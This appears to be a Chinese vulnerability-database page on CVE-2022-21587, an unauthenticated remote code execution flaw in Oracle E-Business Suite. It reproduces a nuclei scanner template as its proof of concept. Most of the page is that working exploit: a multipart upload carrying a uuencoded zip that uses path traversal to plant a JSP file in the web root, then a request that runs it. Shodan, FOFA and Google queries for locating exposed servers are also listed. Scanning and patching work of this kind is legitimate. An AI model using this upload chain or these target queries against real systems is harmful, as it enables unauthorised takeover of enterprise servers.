漏洞信息
漏洞名称: Oracle E-Business Suite Remote Code Execution Vulnerability
漏洞编号:
漏洞类型: 命令执行
漏洞等级: 严重
漏洞描述: Oracle E-Business Suite是一个综合的企业级应用软件套件,广泛用于全球各大企业的财务管理、供应链管理、人力资源管理等关键业务操作。它支持企业实现业务流程的自动化和优化,是企业资源规划(ERP)领域的重要解决方案之一。该漏洞存在于Oracle Web Applications Desktop Integrator产品的上传组件中,允许攻击者通过HTTP网络访问执行恶意代码,无需必要的凭证即可完全控制受影响的系统。
漏洞的技术根源在于上传组件未对用户提交的文件进行充分的验证和过滤,导致攻击者可以上传恶意文件并执行任意代码。这种类型的漏洞通常由于缺乏严格的输入验证和安全编码实践造成,使得攻击者能够利用系统漏洞进行远程代码执行。
此漏洞的影响极为严重,攻击者可以利用它执行任意代码,获取敏感信息,修改数据,甚至完全控制受影响的系统。由于攻击不需要任何形式的认证,因此可以被自动化工具大规模利用,对企业的信息安全构成重大威胁。企业应立即应用Oracle提供的安全补丁以防范此漏洞的潜在风险。
产品厂商: Oracle
产品名称: Oracle E-Business Suite
影响版本: 12.2.3 through 12.2.11
搜索语法: http.title:”login” “x-oracle-dms-ecid” 200
来源: https://github.com/projectdiscovery/nuclei-templates/blob/2ec38e7e552e240343537693282608e360ca1e65/http%2Fcves%2F2022%2FCVE-2022-21587.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
|
id: CVE-2022-21587
info:
name: Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution
author: rootxharsh,iamnoooob,pdresearch,dogasantos
severity: critical
description: |
Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
remediation: |
Apply the necessary security patches provided by Oracle to mitigate this vulnerability.
reference:
- https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/
- https://www.oracle.com/security-alerts/cpuoct2022.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-21587
- http://packetstormsecurity.com/files/171208/Oracle-E-Business-Suite-EBS-Unauthenticated-Arbitrary-File-Upload.html
- https://github.com/manas3c/CVE-POC
- https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis?utm_source=rapid7site&utm_medium=referral&utm_campaign=etr_cve-2022-21587
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-21587
cwe-id: CWE-306
epss-score: 0.97364
epss-percentile: 0.99901
cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: oracle
product: e-business_suite
shodan-query: http.title:"login" "x-oracle-dms-ecid" 200
fofa-query: title="login" "x-oracle-dms-ecid" 200
google-query: intitle:"login" "x-oracle-dms-ecid" 200
tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm
http:
- raw:
- |
POST /OA_HTML/BneOfflineLOVService?bne:uueupload=true HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
------WebKitFormBoundaryZsMro0UsAQYLDZGv
Content-Disposition: form-data; name="bne:uueupload"
TRUE
------WebKitFormBoundaryZsMro0UsAQYLDZGv
Content-Disposition: form-data; name="uploadfilename";filename="taintedlove.zip"
begin 644 taintedlove.zip
M4$L
M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V%P<&QI8V%T:6]N<R]F;W)M<R]F
M;W)M<R]T86EN="YJ<W!C870@/B!T86EN="YJ<W`*/"4*("`@(&]U="YP<FEN
M="@B,#8Q96$S,#8M-#9E9BTQ,68P+6%D.30M9C-D,3@S8C`V.#EA(BD["B4^
M"E!+`0(4`Q0``````$1QRUK1ELZ-30```$T```!*``````````````"D@0``
M```N+B\N+B\N+B\N+B\N+B]&35=?2&]M92]/<F%C;&5?14)3+6%P<
M;&EC871I;VYS+V9O<FUS+V9O<FUS+W1A:6YT+FIS<%!+!08``````0`!`'@`
(``"U````````
`
end
------WebKitFormBoundaryZsMro0UsAQYLDZGv--
- |
GET /forms/taint.jsp HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body_2
words:
- 061ea306-46ef-11f0-ad94-f3d183b0689a
|